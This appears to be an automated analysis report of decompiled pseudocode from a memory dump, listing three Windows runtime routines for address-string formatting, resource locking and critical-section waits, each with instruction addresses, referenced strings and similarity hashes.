                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01FB14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E01FB14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2052088; // 0x774e8a49
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01FA7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01FB13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01FA7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01FA7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01F72340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01F7E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                      0x01fb14c0
                                                                                                                                                      0x01fb14cb
                                                                                                                                                      0x01fb14d2
                                                                                                                                                      0x01fb14d6
                                                                                                                                                      0x01fb14da
                                                                                                                                                      0x01fb14de
                                                                                                                                                      0x01fb14e3
                                                                                                                                                      0x01fb157a
                                                                                                                                                      0x01fb157a
                                                                                                                                                      0x01fb14f1
                                                                                                                                                      0x01fb14f3
                                                                                                                                                      0x01fdea0f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdea15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdea15
                                                                                                                                                      0x01fb14f9
                                                                                                                                                      0x01fb14f9
                                                                                                                                                      0x01fb14fe
                                                                                                                                                      0x01fb1504
                                                                                                                                                      0x01fdea1a
                                                                                                                                                      0x01fdea1f
                                                                                                                                                      0x01fdea21
                                                                                                                                                      0x01fdea22
                                                                                                                                                      0x01fdea27
                                                                                                                                                      0x01fdea2a
                                                                                                                                                      0x01fdea2a
                                                                                                                                                      0x01fb1515
                                                                                                                                                      0x01fb1517
                                                                                                                                                      0x01fb156d
                                                                                                                                                      0x01fb1572
                                                                                                                                                      0x01fb1575
                                                                                                                                                      0x01fb1575
                                                                                                                                                      0x01fb151e
                                                                                                                                                      0x01fdea50
                                                                                                                                                      0x01fdea55
                                                                                                                                                      0x01fdea58
                                                                                                                                                      0x01fdea58
                                                                                                                                                      0x01fb152e
                                                                                                                                                      0x01fb1531
                                                                                                                                                      0x01fb1533
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb1535
                                                                                                                                                      0x01fb1541
                                                                                                                                                      0x01fb1549
                                                                                                                                                      0x01fb1549
                                                                                                                                                      0x01fb1533
                                                                                                                                                      0x01fb14f3
                                                                                                                                                      0x01fb1559

                                                                                                                                                      APIs
                                                                                                                                                      • ___swprintf_l.LIBCMT ref: 01FDEA22
                                                                                                                                                        • Part of subcall function 01FB13CB: ___swprintf_l.LIBCMT ref: 01FB146B
                                                                                                                                                        • Part of subcall function 01FB13CB: ___swprintf_l.LIBCMT ref: 01FB1490
                                                                                                                                                      • ___swprintf_l.LIBCMT ref: 01FB156D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                                      • Opcode ID: c28f0c1e75e705fd1cc2c86c8c8257c98d578d6d30fde97edb8baa52d93be2a1
                                                                                                                                                      • Instruction ID: 0587b2148e4e7bb3f44ec491d290a49f399274eacb7b5176be005ba454a4dcb8
                                                                                                                                                      • Opcode Fuzzy Hash: c28f0c1e75e705fd1cc2c86c8c8257c98d578d6d30fde97edb8baa52d93be2a1
                                                                                                                                                      • Instruction Fuzzy Hash: 0921F572D0021ADBDB21EE59DC90AEF77ACBF50310F484116ED46D3100DB76EA588BE1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F953A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                                      			E01F953A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020501c0;
									_push(_t92);
									_push(0);
									_t37 = E01F6F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01FB4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01FC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01FF217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01FC3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01FB3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01F95384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01F6F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01FB3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01F6F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01FB3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01F6F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01FB3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E01F95329(_t74, _t92);
													_push(1);
													_t48 = E01F953A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                      0x01f953ab
                                                                                                                                                      0x01f953ae
                                                                                                                                                      0x01f953b1
                                                                                                                                                      0x01f953b4
                                                                                                                                                      0x01f953b7
                                                                                                                                                      0x01fb05b6
                                                                                                                                                      0x01fb05c0
                                                                                                                                                      0x01fb05c3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb05c9
                                                                                                                                                      0x01fb05c9
                                                                                                                                                      0x01fb05cc
                                                                                                                                                      0x01fb05d5
                                                                                                                                                      0x01fb05d5
                                                                                                                                                      0x01f953bd
                                                                                                                                                      0x01f953bd
                                                                                                                                                      0x01f953bd
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2269
                                                                                                                                                      0x01fd226d
                                                                                                                                                      0x01fd2349
                                                                                                                                                      0x01fd234d
                                                                                                                                                      0x01fd2273
                                                                                                                                                      0x01fd2276
                                                                                                                                                      0x01fd2279
                                                                                                                                                      0x01fd227e
                                                                                                                                                      0x01fd2283
                                                                                                                                                      0x01fd2287
                                                                                                                                                      0x01fd228a
                                                                                                                                                      0x01fd228d
                                                                                                                                                      0x01fd228f
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22be
                                                                                                                                                      0x01fd22c4
                                                                                                                                                      0x01fd22cc
                                                                                                                                                      0x01fd22d0
                                                                                                                                                      0x01fd22d6
                                                                                                                                                      0x01fd22d7
                                                                                                                                                      0x01fd22da
                                                                                                                                                      0x01fd22df
                                                                                                                                                      0x01fd22e4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22e6
                                                                                                                                                      0x01fd22e9
                                                                                                                                                      0x01fd22f4
                                                                                                                                                      0x01fd22f9
                                                                                                                                                      0x01fd22fa
                                                                                                                                                      0x01fd2305
                                                                                                                                                      0x01fd2314
                                                                                                                                                      0x01fd2319
                                                                                                                                                      0x01fd231a
                                                                                                                                                      0x01fd231d
                                                                                                                                                      0x01fd2320
                                                                                                                                                      0x01fd2323
                                                                                                                                                      0x01fd2323
                                                                                                                                                      0x01fd2328
                                                                                                                                                      0x01fd232d
                                                                                                                                                      0x01fd232f
                                                                                                                                                      0x01fd2331
                                                                                                                                                      0x01fd2336
                                                                                                                                                      0x01fd2336
                                                                                                                                                      0x01fd233b
                                                                                                                                                      0x01fd233d
                                                                                                                                                      0x01fd2350
                                                                                                                                                      0x01fd2351
                                                                                                                                                      0x01fd2356
                                                                                                                                                      0x01fd2359
                                                                                                                                                      0x01fd2359
                                                                                                                                                      0x01fd235b
                                                                                                                                                      0x01fd235d
                                                                                                                                                      0x01f95367
                                                                                                                                                      0x01f9536b
                                                                                                                                                      0x01f95372
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2363
                                                                                                                                                      0x01fd2363
                                                                                                                                                      0x01fd2369
                                                                                                                                                      0x01fd236a
                                                                                                                                                      0x01fd236c
                                                                                                                                                      0x01fd2371
                                                                                                                                                      0x01fd2373
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2379
                                                                                                                                                      0x01fd2379
                                                                                                                                                      0x01fd237a
                                                                                                                                                      0x01fd237f
                                                                                                                                                      0x01fd237f
                                                                                                                                                      0x01fd2385
                                                                                                                                                      0x01fd2386
                                                                                                                                                      0x01fd2389
                                                                                                                                                      0x01fd238e
                                                                                                                                                      0x01fd2390
                                                                                                                                                      0x01f95378
                                                                                                                                                      0x01f9537c
                                                                                                                                                      0x01fd2396
                                                                                                                                                      0x01fd2396
                                                                                                                                                      0x01fd2397
                                                                                                                                                      0x01fd239c
                                                                                                                                                      0x01fd23a2
                                                                                                                                                      0x01fd23a3
                                                                                                                                                      0x01fd23a6
                                                                                                                                                      0x01fd23ab
                                                                                                                                                      0x01fd23ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd23b3
                                                                                                                                                      0x01fd23b3
                                                                                                                                                      0x01fd23b4
                                                                                                                                                      0x01fd23b9
                                                                                                                                                      0x01fd23ba
                                                                                                                                                      0x01fd23ba
                                                                                                                                                      0x01fd23bc
                                                                                                                                                      0x01fd23bf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9153
                                                                                                                                                      0x01fc9158
                                                                                                                                                      0x01fc915a
                                                                                                                                                      0x01fc915e
                                                                                                                                                      0x01fc9160
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9166
                                                                                                                                                      0x01fc9166
                                                                                                                                                      0x01fc9171
                                                                                                                                                      0x01fc9176
                                                                                                                                                      0x01fc9176
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9160
                                                                                                                                                      0x01fd23c6
                                                                                                                                                      0x01fd23cb
                                                                                                                                                      0x01fd23ce
                                                                                                                                                      0x01fd23d7
                                                                                                                                                      0x01fd23d7
                                                                                                                                                      0x01fd23ad
                                                                                                                                                      0x01fd2390
                                                                                                                                                      0x01fd2373
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x01fd2291
                                                                                                                                                      0x01fd2291
                                                                                                                                                      0x01fd2293
                                                                                                                                                      0x01fd2295
                                                                                                                                                      0x01fd229a
                                                                                                                                                      0x01fd22a1
                                                                                                                                                      0x01fd22a3
                                                                                                                                                      0x01fd22a7
                                                                                                                                                      0x01fd22a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22ab
                                                                                                                                                      0x01fd22ad
                                                                                                                                                      0x01fd22af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22af
                                                                                                                                                      0x01fd22b1
                                                                                                                                                      0x01fd22b4
                                                                                                                                                      0x01fd22b4
                                                                                                                                                      0x01fd22b6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22b6
                                                                                                                                                      0x01fd228f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd226d
                                                                                                                                                      0x01f953cb
                                                                                                                                                      0x01f953ce
                                                                                                                                                      0x01f953d0
                                                                                                                                                      0x01f953d4
                                                                                                                                                      0x01f953d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f953d8
                                                                                                                                                      0x01f953e3
                                                                                                                                                      0x01f953ea
                                                                                                                                                      0x01f953ea
                                                                                                                                                      0x01f953d6
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FD22F4
                                                                                                                                                      Strings
                                                                                                                                                      • RTL: Re-Waiting, xrefs: 01FD2328
                                                                                                                                                      • RTL: Resource at %p, xrefs: 01FD230B
                                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01FD22FC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                      • API String ID: 885266447-871070163
                                                                                                                                                      • Opcode ID: 7511a732a47184f58b5645fc75e46045e6560067b854e1584e3e8330e8d2b8c7
                                                                                                                                                      • Instruction ID: 2c4241de30dbebbddd55ece1904ee2d3fd49680e524526eb2bec6d766e840e29
                                                                                                                                                      • Opcode Fuzzy Hash: 7511a732a47184f58b5645fc75e46045e6560067b854e1584e3e8330e8d2b8c7
                                                                                                                                                      • Instruction Fuzzy Hash: D051F971600707ABEF16EF29DC80FA673AAAF54720F10461AFD45DB255EA63E84187D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F9EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                      			E01F9EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01F8DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x205793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01F716C0(_t39);
				} else {
					_t40 = E01F6F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01FB3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01F701A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x205793c; // 0x0
								_push(_t85);
								_t44 = E01F71F28(_t71);
							} else {
								_t44 = E01F6F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01FB3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01FF2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01F9EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01FB4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01FC3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01FC3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x20520c0;
								if(_t85 != 0x20520c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01FF217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01FC3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                      0x01f9ec56
                                                                                                                                                      0x01f9ec56
                                                                                                                                                      0x01f9ec56
                                                                                                                                                      0x01f9ec5c
                                                                                                                                                      0x01f9ec64
                                                                                                                                                      0x01fd23e6
                                                                                                                                                      0x01fd23eb
                                                                                                                                                      0x01fd23eb
                                                                                                                                                      0x01f9ec6a
                                                                                                                                                      0x01f9ec6c
                                                                                                                                                      0x01f9ec6f
                                                                                                                                                      0x01fd23f3
                                                                                                                                                      0x01fd23f8
                                                                                                                                                      0x01fd23fa
                                                                                                                                                      0x01fd23fc
                                                                                                                                                      0x01f9ec75
                                                                                                                                                      0x01f9ec76
                                                                                                                                                      0x01f9ec76
                                                                                                                                                      0x01f9ec7b
                                                                                                                                                      0x01f9ec7c
                                                                                                                                                      0x01f9ec7e
                                                                                                                                                      0x01fd2406
                                                                                                                                                      0x01fd2407
                                                                                                                                                      0x01fd240c
                                                                                                                                                      0x01fd240d
                                                                                                                                                      0x01fd240d
                                                                                                                                                      0x01fd240d
                                                                                                                                                      0x01fd2414
                                                                                                                                                      0x01fd2417
                                                                                                                                                      0x01fd241e
                                                                                                                                                      0x01fd2435
                                                                                                                                                      0x01fd2438
                                                                                                                                                      0x01fd243c
                                                                                                                                                      0x01fd243f
                                                                                                                                                      0x01fd2442
                                                                                                                                                      0x01fd2443
                                                                                                                                                      0x01fd2446
                                                                                                                                                      0x01fd2449
                                                                                                                                                      0x01fd2453
                                                                                                                                                      0x01fd2455
                                                                                                                                                      0x01fd245b
                                                                                                                                                      0x01fd245b
                                                                                                                                                      0x01f9eb99
                                                                                                                                                      0x01f9eb99
                                                                                                                                                      0x01f9eb9c
                                                                                                                                                      0x01f9eb9d
                                                                                                                                                      0x01f9eb9f
                                                                                                                                                      0x01f9eba2
                                                                                                                                                      0x01fd2465
                                                                                                                                                      0x01fd246b
                                                                                                                                                      0x01fd246d
                                                                                                                                                      0x01f9eba8
                                                                                                                                                      0x01f9eba9
                                                                                                                                                      0x01f9eba9
                                                                                                                                                      0x01f9ebae
                                                                                                                                                      0x01f9ebb3
                                                                                                                                                      0x01f9ebb9
                                                                                                                                                      0x01f9ebbb
                                                                                                                                                      0x01fd2513
                                                                                                                                                      0x01fd2514
                                                                                                                                                      0x01fd2519
                                                                                                                                                      0x01fd251b
                                                                                                                                                      0x01f9ec2a
                                                                                                                                                      0x01f9ec2d
                                                                                                                                                      0x01f9ec33
                                                                                                                                                      0x01f9ec36
                                                                                                                                                      0x01f9ec3a
                                                                                                                                                      0x01f9ec3e
                                                                                                                                                      0x01f9ec40
                                                                                                                                                      0x01f9ec47
                                                                                                                                                      0x01f9ec47
                                                                                                                                                      0x01f9ec40
                                                                                                                                                      0x01f722c6
                                                                                                                                                      0x01f9ebc1
                                                                                                                                                      0x01f9ebc1
                                                                                                                                                      0x01f9ebc5
                                                                                                                                                      0x01f9ec9a
                                                                                                                                                      0x01f9ec9a
                                                                                                                                                      0x01f9ebd6
                                                                                                                                                      0x01f9ebd6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f9ebbb
                                                                                                                                                      0x01fd2477
                                                                                                                                                      0x01fd247c
                                                                                                                                                      0x01fd2486
                                                                                                                                                      0x01fd248b
                                                                                                                                                      0x01fd2496
                                                                                                                                                      0x01fd249b
                                                                                                                                                      0x01fd249d
                                                                                                                                                      0x01fd24a0
                                                                                                                                                      0x01fd24a3
                                                                                                                                                      0x01fd24aa
                                                                                                                                                      0x01fd24aa
                                                                                                                                                      0x01fd24a5
                                                                                                                                                      0x01fd24a5
                                                                                                                                                      0x01fd24a5
                                                                                                                                                      0x01fd24ac
                                                                                                                                                      0x01fd24af
                                                                                                                                                      0x01fd24b0
                                                                                                                                                      0x01fd24b3
                                                                                                                                                      0x01fd24b9
                                                                                                                                                      0x01fd24ba
                                                                                                                                                      0x01fd24bb
                                                                                                                                                      0x01fd24c6
                                                                                                                                                      0x01fd24cb
